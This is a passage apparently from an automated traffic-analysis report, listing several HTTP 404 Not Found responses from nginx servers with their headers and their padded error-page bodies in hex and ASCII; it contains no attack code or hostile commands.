MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:51:09 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:51:10 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:51:11 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:51:12 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:51:14 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:51:17 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:51:22 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:51:22 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:51:25 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
